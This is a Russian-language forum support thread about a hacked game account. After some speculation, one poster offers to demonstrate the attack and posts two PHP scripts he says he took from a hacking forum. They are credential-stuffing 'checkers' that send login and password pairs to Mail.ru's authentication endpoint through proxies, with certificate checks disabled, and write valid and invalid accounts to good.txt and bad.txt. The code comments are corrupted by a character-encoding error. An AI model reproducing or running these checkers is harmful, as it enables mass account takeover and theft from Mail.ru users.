Поддержка Взломали акк

Суть вопроса,правильно,что я написал Yukio и keiichi о данной проблеме в пм на форуме,или надо кому-то(куда-то) еще писать,чтобы решить этот вопрос?

 

Ну взломали и что? Насколько я знаю, то систему ПИН код персонажа никак не обойти (на нее кейлогер не должен работать, т.к цифры при каждом новом входе на аккаунт меняют свое местоположение), т.е злоумышленник никак не сможет зайти дальше лобби. Значит давали кому-то аккаунт из близких, знакомых или домашних питомцев.

 

Может мастер акк взломали...

 

значит кто-то умеет брутить и работать с curl

 

как уже написал, без определенных знаний толку в этом мало, да и если это имущество где-то продается то сто процентов где-то на ммору
мы по твоему желанию можем пойти, где я покажу примерно как делается, а ты может придумаешь как можно защиту доработать... ато реально как-то стремно бывает)
ну хотя скорее всего как в 90% случаев, школьники не знающие о том что можно высмотреть в логах, пытаются нажиться.

я тут исходник с юхака стырил, по этой теме... это чекер всего мыловского, по той же схеме можно и с почтой сделать.

Спойлер: тык

PHP:

$url = 'https://auth.mail.ru/'; // URL ñàéòà íà êîòîðîì áóäåì àâòîðèçîâàòüñÿ
$urlTo = 'http://my.mail.ru/cgi-bin/login?site_id=1_1000006_1000198_0&page=http%3a%2f%2fmy.mail.ru%2fapps%2f552078%3fref%3dpromo%26anchor%3d&autoauth=1'; // URL íà êîòîðîé áóäåì ñëàòü POST äàííûå
$email = c("edit1")->text;
$login = c("edit4")->text; // Âàø ëîãèí
$passw = c("edit5")->text; // Âàø ïàðîëü
$post = "page=&post=&login_from=&lang=&setLang=&Login=$login&Domain=$email&Password=$passw&saveauth=1&new_auth_form=1"; // POST äàííûå
$proxy = c("listBox2")->items->count-1;
$proxy2 = c("listBox2")->items->lines[$proxy];
$memo = c("memo2")->text;
$email = c("edit1")->text;
$pass1 = c("edit4")->text;
$pass = c("edit5")->text;
$times = c("label9")->caption;
$dates = c("label10")->caption;
c("memo1")->text .= "[$times - $dates]Checking account... \n";
$ch = curl_init(); // ??íèöèàëèçèðóåì ñåàíñ CURL
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_URL, $url); // Çàõîäèì íà ñàéò
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // Äåëàåì òàê, ÷òîáû ñòðàíèöà íå âûäàâàëàñü ñðàçó â ïîòîê, à ìîæíî áûëî åå çàïèñàòü â ïåðåìåííóþ
$html = curl_exec($ch); // ??ìèòèðóåì çàõîä íà ñàéò
curl_setopt($ch, CURLOPT_URL, $urlTo); // Óñòàíàâëèâàåì àäðåñ êóäà áóäåì ñëàòü POST äàííûå
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt"); // Çàïèñûâàåì cookies â ôàéë, ÷òîáû ïîòîì ìîæíî áûëî èõ ñ÷èòàòü
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt"); // Òåïåðü ÷èòàåì cookies ñ ôàéëà
curl_setopt($ch, CURLOPT_POST, true); // Ãîâîðèì, ÷òî èíôîðìàöèÿ áóäåò îòïðàâëÿòüñÿ ìåòîäîì POST
curl_setopt($ch, CURLOPT_TIMEOUT, 60);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post); // Ïåðåäàåì POST äàííûå
curl_setopt($ch, CURLOPT_PROXYTYPE,CURLPROXY_HTTP);
curl_setopt($ch, CURLOPT_PROXY, "$proxy2");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); // ??íîãäà áûâàåò, ÷òî ïîñëå îòïðàâêè äàííûõ ïðîèñõîäèò ðåäèðåêò heaer('Location:...').
// Ýòîò ïàðàìåòð ãîâîðèò î òî, ÷òîáû ìû ñëåäîâàëè çà íèìè, à íå îñòàâàëèñü íà ìåñòå ïîñëå îòïðàâêè äàííûõ

$html = curl_exec($ch); // Çàïèñûâàåì ïðèøåäøèå äàííûå â ïåðåìåííóþ
curl_close($ch); // Çàêðûâàåì ñåàíñ ðàáîòû CURL
 // ?? âóàëÿ  Âûâîäèì àâòîðèçîâàííóþ ñòðàíèöó

c("memo2")->text = $html;
$text = 'l-loginform-row_label_lostpass';
if(preg_match("/$text/", $memo)){
c("label5")->caption +=1;
c("edit3")->text = "Status: +1 bad...";
$times = c("label9")->caption;
c("label8")->caption +=1;
$dates = c("label10")->caption;
c("memo1")->text .= "[$times - $dates]+1 Bad \n";
$fh = fopen('bad.txt', "a+");
fwrite($fh, "$pass1@$email;$pass"._BR_);
fclose($fh);
c("label8")->caption +=1;
}
else{
c("label3")->caption +=1;
c("edit3")->text = "Status: +1 good...";
$times = c("label9")->caption;
$dates = c("label10")->caption;
c("memo1")->text .= "[$times - $dates]+1 good \n";
$fh = fopen('good.txt', "a+");
fwrite($fh, "$pass1@$email;$pass"._BR_);
fclose($fh);
}

или вот, конкретно случай с почтой:

Спойлер: тык

PHP:

$url = 'https://auth.mail.ru/'; // URL ñàéòà íà êîòîðîì áóäåì àâòîðèçîâàòüñÿ

$urlTo = 'https://auth.mail.ru/cgi-bin/auth'; // URL íà êîòîðîé áóäåì ñëàòü POST äàííûå

$email = c("edit1")->text;

$login = c("edit4")->text; // Âàø ëîãèí

$passw = c("edit5")->text; // Âàø ïàðîëü

$post = "page=&post=&login_from=&lang=&setLang=&Login=$login&Domain=$email&Password=$passw&saveauth=1&new_auth_form=1"; // POST äàííûå

$ch = curl_init(); // ??íèöèàëèçèðóåì ñåàíñ CURL

curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);

curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);

curl_setopt($ch, CURLOPT_URL, $url); // Çàõîäèì íà ñàéò

curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // Äåëàåì òàê, ÷òîáû ñòðàíèöà íå âûäàâàëàñü ñðàçó â ïîòîê, à ìîæíî áûëî åå çàïèñàòü â ïåðåìåííóþ

$html = curl_exec($ch); // ??ìèòèðóåì çàõîä íà ñàéò

curl_setopt($ch, CURLOPT_URL, $urlTo); // Óñòàíàâëèâàåì àäðåñ êóäà áóäåì ñëàòü POST äàííûå

curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt'); // Çàïèñûâàåì cookies â ôàéë, ÷òîáû ïîòîì ìîæíî áûëî èõ ñ÷èòàòü

curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt'); // Òåïåðü ÷èòàåì cookies ñ ôàéëà

curl_setopt($ch, CURLOPT_POST, true); // Ãîâîðèì, ÷òî èíôîðìàöèÿ áóäåò îòïðàâëÿòüñÿ ìåòîäîì POST

curl_setopt($ch, CURLOPT_POSTFIELDS, $post); // Ïåðåäàåì POST äàííûå

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); // ??íîãäà áûâàåò, ÷òî ïîñëå îòïðàâêè äàííûõ ïðîèñõîäèò ðåäèðåêò heaer('Location:...').

$html = curl_exec($ch); // Çàïèñûâàåì ïðèøåäøèå äàííûå â ïåðåìåííóþ

curl_close($ch); // Çàêðûâàåì ñåàíñ ðàáîòû CURL

c("memo2")->text = $html;